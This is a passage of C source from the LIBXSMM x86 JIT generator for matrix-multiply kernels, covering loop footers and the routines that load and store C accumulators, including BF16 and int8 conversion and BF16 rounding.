libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_help_0, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
}
libxsmm_generator_gemm_footer_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config, i_xgemm_desc);
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
} else {
/* handle trans B */
int l_b_offset = 0;
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) > 0 ) {
l_b_offset = i_n_blocking * i_micro_kernel_config->datatype_size;
} else {
l_b_offset = i_n_blocking * i_xgemm_desc->ldb * i_micro_kernel_config->datatype_size;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_b, l_b_offset );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_a, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch, ((i_xgemm_desc->m)*(i_micro_kernel_config->datatype_size)) );
}
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_nloop, i_n_done );
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
}
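/* m-loop header/footer pair: the header places the jump-back label and
   advances the m counter by i_m_blocking. The footer advances the C
   pointer to the next m panel (again scaled down for BF16/I8 outputs),
   repositions the A and prefetch pointers by k*lda minus the m panel just
   covered, per batch-reduce entry when the address-based batch-reduce
   flag is set, and loops while the m counter is below i_m_done. */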
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_header_mloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const unsigned int i_m_blocking ) {
libxsmm_x86_instruction_register_jump_back_label( io_generated_code, io_loop_label_tracker );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction, i_gp_reg_mapping->gp_reg_mloop, i_m_blocking );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_footer_mloop( libxsmm_generated_code* io_generated_code,
libxsmm_loop_label_tracker* io_loop_label_tracker,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_m_done ) {
/* advance C pointer */
if ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c, i_m_blocking*(i_micro_kernel_config->datatype_size/2) );
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c, i_m_blocking*(i_micro_kernel_config->datatype_size/4) );
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c, i_m_blocking*(i_micro_kernel_config->datatype_size) );
}
/* C prefetch */
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_c_prefetch, i_m_blocking*(i_micro_kernel_config->datatype_size) );
}
#endif
/* B prefetch */
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C_AHEAD ) {
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) == 0 ) {
unsigned int l_type_scaling;
if ( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ||
(LIBXSMM_GEMM_PRECISION_I16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype )) ) {
l_type_scaling = 2;
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
l_type_scaling = 4;
} else {
l_type_scaling = 1;
}
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_add_instruction,
i_gp_reg_mapping->gp_reg_b_prefetch, i_m_blocking*(i_micro_kernel_config->datatype_size/l_type_scaling) );
}
}
/* A prefetch */
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C) {
if (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS) {
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2 ) {
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_generator_gemm_header_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_help_0,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) -
(i_m_blocking * (i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a_prefetch,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
libxsmm_generator_gemm_footer_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config, i_xgemm_desc);
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
}
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_a_prefetch,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) -
(i_m_blocking * (i_micro_kernel_config->datatype_size)) );
}
}
/* advance A pointer */
if (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_ADDRESS) {
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_generator_gemm_header_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
0 );
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_help_0,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) - (i_m_blocking * (i_micro_kernel_config->datatype_size)) );
libxsmm_x86_instruction_alu_mem( io_generated_code,
i_micro_kernel_config->alu_mov_instruction,
i_gp_reg_mapping->gp_reg_a,
i_gp_reg_mapping->gp_reg_reduce_loop, 8,
0,
i_gp_reg_mapping->gp_reg_help_0,
1 );
libxsmm_generator_gemm_footer_reduceloop( io_generated_code, io_loop_label_tracker, i_gp_reg_mapping, i_micro_kernel_config, i_xgemm_desc);
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_reduce_loop );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_0 );
} else {
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_sub_instruction, i_gp_reg_mapping->gp_reg_a,
((i_xgemm_desc->k) * (i_micro_kernel_config->datatype_size) * (i_xgemm_desc->lda) ) - (i_m_blocking * (i_micro_kernel_config->datatype_size)) );
}
/* loop handling */
libxsmm_x86_instruction_alu_imm( io_generated_code, i_micro_kernel_config->alu_cmp_instruction, i_gp_reg_mapping->gp_reg_mloop, i_m_done );
libxsmm_x86_instruction_jump_back_to_label( io_generated_code, i_micro_kernel_config->alu_jmp_instruction, io_loop_label_tracker );
}
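/* Loads (beta = 1) or zeroes (beta = 0) the C accumulator registers.
   Accumulators are allocated from the top of the vector register file
   downward, starting at vector_reg_count - (i_n_blocking * l_m_blocking).
   A worked example with illustrative values: AVX-512 F32 (vector_length =
   16) with i_m_blocking = 64 and i_n_blocking = 6 gives l_m_blocking = 4,
   so the 24 accumulators occupy zmm8..zmm31 (32 - 6*4 = 8). BF16 and I8
   outputs are widened to 32-bit accumulators on load. */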
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_load_C( libxsmm_generated_code* io_generated_code,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_n_blocking ) {
unsigned int l_m_blocking, l_vec_reg_acc_start;
/* register blocking counter in n */
unsigned int l_n = 0;
/* register blocking counter in m */
unsigned int l_m = 0;
assert(0 < i_micro_kernel_config->vector_length);
/* deriving register blocking from kernel config */
l_m_blocking = ( i_m_blocking % i_micro_kernel_config->vector_length == 0 ) ? i_m_blocking/i_micro_kernel_config->vector_length : (i_m_blocking/i_micro_kernel_config->vector_length)+1;
/* start register of accumulator */
l_vec_reg_acc_start = i_micro_kernel_config->vector_reg_count - (i_n_blocking * l_m_blocking);
#if !defined(NDEBUG)
/* Sanity-check that the requested register blocking can actually be
generated. These checks are compiled out in release mode (NDEBUG), so
an invalid blocking would go undetected there. */
if (i_micro_kernel_config->instruction_set == LIBXSMM_X86_SSE3 ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX2 ) {
if ( (i_n_blocking > 3) || (i_n_blocking < 1) || (i_m_blocking < 1) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set < LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (l_m_blocking != 1) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (l_m_blocking < 1) || (l_m_blocking > 6) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else {}
#if 0
if ( i_m_blocking % i_micro_kernel_config->vector_length != 0 ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_M_BLOCK );
return;
}
#endif
#endif /*!defined(NDEBUG)*/
/* load C accumulator */
if (0 == (LIBXSMM_GEMM_FLAG_BETA_0 & i_xgemm_desc->flags)) { /* Beta=1 */
/* pure BF16 kernel */
if ( ( (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE) && (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) ) &&
( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* beta = 1: up-convert the BF16 C values to FP32 so they can be accumulated */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
/* load 16 bit values into ymm portion of the register */
if ( (i_micro_kernel_config->use_masking_a_c != 0) && ( l_m == (l_m_blocking - 1) ) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU16,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 2, 1, 0 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->c_vmove_instruction,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 1, 0 );
}
/* convert 16 bit values into 32 bit (integer convert) */
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVSXWD,
i_micro_kernel_config->vector_name,
0, LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF);
/* shift 16 bits to the left to generate valid FP32 numbers */
libxsmm_x86_instruction_vec_shuffle_reg(io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPSLLD_I,
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
16);
}
}
/* pure int8 kernel */
} else if ( ( (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE) && (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) ) &&
( (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* we need to up convert int8 to int32 */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
/* load 8 bit values into the xmm portion of the register */
if ( (i_micro_kernel_config->use_masking_a_c != 0) && ( l_m == (l_m_blocking - 1) ) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU8,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/4),
'z',
0, 2, 1, 0 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->c_vmove_instruction,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/4),
'x',
0, 0, 1, 0 );
}
/* convert 8 bit values into 32 bit (integer convert) */
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_C_UNSIGNED) != 0 ) {
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVZXBD,
i_micro_kernel_config->vector_name,
0, LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF);
} else {
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVSXBD,
i_micro_kernel_config->vector_name,
0, LIBXSMM_X86_VEC_REG_UNDEF,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
LIBXSMM_X86_VEC_REG_UNDEF);
}
}
}
} else {
/* adding to C, so let's load C */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
/* we only mask the last m-blocked load */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->c_vmove_instruction,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size),
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n), ( l_m == (l_m_blocking - 1) ) ? i_micro_kernel_config->use_masking_a_c : 0, 1, 0 );
}
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
for (l_m = 0; l_m < l_m_blocking; l_m++ ) {
libxsmm_x86_instruction_prefetch( io_generated_code,
i_micro_kernel_config->prefetch_instruction,
i_gp_reg_mapping->gp_reg_c_prefetch,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size));
}
}
#endif
}
}
} else {
/* overwriting C (beta = 0), so xor-zero the accumulators */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->vxor_instruction,
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n),
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n) );
}
#if 0
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_CL2 ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2CL2BL2_VIA_C ) {
for (l_m = 0; l_m < l_m_blocking; l_m++ ) {
libxsmm_x86_instruction_prefetch( io_generated_code,
i_micro_kernel_config->prefetch_instruction,
i_gp_reg_mapping->gp_reg_c_prefetch,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size));
}
}
#endif
}
}
}
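/* Stores the accumulators back to C, selecting streaming stores when
   LIBXSMM_GEMM_FLAG_ALIGN_C_NTS_HINT is set. BF16 output uses a software
   round-to-nearest-even down-conversion on AVX512_CORE/CLX and
   VCVTNE(2)PS2BF16 on CPX and later; I8 output is scaled, passed through
   ReLU and packed with saturation. A scalar C sketch of the RNE rounding
   that the AVX512_CORE/CLX path implements with the stack constants
   pushed below (illustration only, not part of the generator):

     uint32_t u;
     memcpy(&u, &fp32_value, sizeof(u));
     if ((u & 0x7f800000u) != 0x7f800000u) { // leave NaN/Inf untouched
       uint32_t lsb = (u >> 16) & 1u;        // LSB of the truncated bf16
       u += 0x7fffu + lsb;                   // round to nearest, ties to even
     }
     bf16_result = (uint16_t)(u >> 16);
*/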
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_store_C( libxsmm_generated_code* io_generated_code,
const libxsmm_gp_reg_mapping* i_gp_reg_mapping,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_m_blocking,
const unsigned int i_n_blocking )
{
/* deriving register blocking from kernel config */
unsigned int l_m_blocking = ( i_m_blocking % i_micro_kernel_config->vector_length == 0 ) ? i_m_blocking/i_micro_kernel_config->vector_length : (i_m_blocking/i_micro_kernel_config->vector_length)+1;
/* register blocking counter in n */
unsigned int l_n = 0;
/* register blocking counter in m */
unsigned int l_m = 0;
/* start register of accumulator */
unsigned int l_vec_reg_acc_start = i_micro_kernel_config->vector_reg_count - (i_n_blocking * l_m_blocking);
/* select store instruction */
unsigned int l_vstore = (LIBXSMM_GEMM_FLAG_ALIGN_C_NTS_HINT == (LIBXSMM_GEMM_FLAG_ALIGN_C_NTS_HINT & i_xgemm_desc->flags)) ? i_micro_kernel_config->c_vmove_nts_instruction : i_micro_kernel_config->c_vmove_instruction;
/* @TODO fix this test */
#if !defined(NDEBUG)
if (i_micro_kernel_config->instruction_set == LIBXSMM_X86_SSE3 ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX ||
i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX2 ) {
if ( (i_n_blocking > 3) || (i_n_blocking < 1) || (i_m_blocking < 1) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set < LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (i_m_blocking != i_micro_kernel_config->vector_length) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else if ( i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE ) {
if ( (i_n_blocking > 30) || (i_n_blocking < 1) || (l_m_blocking < 1) || (l_m_blocking > 6) ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_REG_BLOCK );
return;
}
} else {}
#if 0
if ( i_m_blocking % i_micro_kernel_config->vector_length != 0 ) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_M_BLOCK );
return;
}
#endif
#endif
if ( ( (i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX512_CORE) || (i_micro_kernel_config->instruction_set == LIBXSMM_X86_AVX512_CLX) ) &&
( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* init stack with helper variables for SW-based RNE rounding */
/* push 0x7f800000 on the stack, naninf masking */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x7f800000);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* push 0x00010000 on the stack, fixup masking */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x00010000);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* push 0x00007fff on the stack, rneadd */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x00007fff);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* push 0x00000001 on the stack, fixup */
libxsmm_x86_instruction_alu_imm( io_generated_code, LIBXSMM_X86_INSTR_MOVQ, i_gp_reg_mapping->gp_reg_help_2, 0x00000001);
libxsmm_x86_instruction_push_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
/* storing downconverted and rounded C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
/* and with naninf */
libxsmm_x86_instruction_vec_compute_mem( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPANDD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
24,
i_micro_kernel_config->vector_name,
reg_X,
0 );
/* and with fixup */
libxsmm_x86_instruction_vec_compute_mem( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPANDD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
16,
i_micro_kernel_config->vector_name,
reg_X,
1 );
/* compute naninf mask k7 */
libxsmm_x86_instruction_vec_compute_mem_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPCMPD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
24,
i_micro_kernel_config->vector_name,
0,
LIBXSMM_X86_VEC_REG_UNDEF,
4,
7, 0 );
/* compute fixup mask k6 */
libxsmm_x86_instruction_vec_compute_mem_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPCMPD,
1,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF,
0,
16,
i_micro_kernel_config->vector_name,
1,
LIBXSMM_X86_VEC_REG_UNDEF,
0,
6, 0 );
/* load rneadd */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VBROADCASTSS,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF, 0,
8,
i_micro_kernel_config->vector_name,
0, 0, 1, 0 );
/* load fixup */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VBROADCASTSS,
LIBXSMM_X86_GP_REG_RSP,
LIBXSMM_X86_GP_REG_UNDEF, 0,
0,
i_micro_kernel_config->vector_name,
1, 0, 1, 0 );
/* merge the fixup bit into the rounding constant (lanes selected by mask k6) */
libxsmm_x86_instruction_vec_compute_reg_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPADDD,
i_micro_kernel_config->vector_name,
1,
0,
0,
LIBXSMM_X86_IMM_UNDEF,
6,
0 );
/* add the rounding constant to the accumulator (NaN/Inf lanes excluded via mask k7) */
libxsmm_x86_instruction_vec_compute_reg_mask( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPADDD,
i_micro_kernel_config->vector_name,
0,
reg_X,
reg_X,
LIBXSMM_X86_IMM_UNDEF,
7,
0 );
/* shift FP32 by 16bit to right */
libxsmm_x86_instruction_vec_shuffle_reg(io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPSRAD_I,
i_micro_kernel_config->vector_name,
reg_X,
LIBXSMM_X86_VEC_REG_UNDEF,
reg_X,
16);
/* down-convert the 32 bit values to packed 16 bit */
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VPMOVDW,
i_micro_kernel_config->vector_name,
reg_X, LIBXSMM_X86_VEC_REG_UNDEF,
0,
LIBXSMM_X86_VEC_REG_UNDEF);
/* store 16 bit values into ymm portion of the register */
if ( (i_micro_kernel_config->use_masking_a_c != 0) && ( l_m == (l_m_blocking - 1) ) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU16,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 2, 0, 1 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
